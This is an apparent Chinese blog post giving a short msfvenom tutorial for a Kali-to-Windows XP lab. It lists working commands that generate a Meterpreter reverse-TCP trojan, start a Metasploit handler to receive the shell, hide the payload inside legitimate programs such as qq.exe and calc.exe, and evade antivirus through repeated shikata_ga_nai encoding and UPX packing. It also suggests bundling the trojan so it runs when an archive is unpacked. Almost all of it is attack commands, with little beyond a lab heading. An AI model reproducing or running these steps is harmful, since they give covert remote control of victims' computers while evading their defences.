msfvenom木马生成

实验环境:

kali、winxp

 

生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -f exe > a.exe


打开msfconsole,等待文件执行弹回shell

use exploit/multi/hander

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set lhost ip

set lport x

exploit

 


文件隐藏处理
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -x qq.exe -k -f exe -o qq.exe

文件隐藏处理还可以和其他文件打包一起,解压文件时自动执行木马程序

 

文件免杀加壳处理
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -x calc.exe lhost=ip lport=4444 -f exe -o calc2.exe
upx -5 qq.exe

posted @ 2020-08-26 17:48  f1veseven  阅读(215)  评论(0编辑  收藏  举报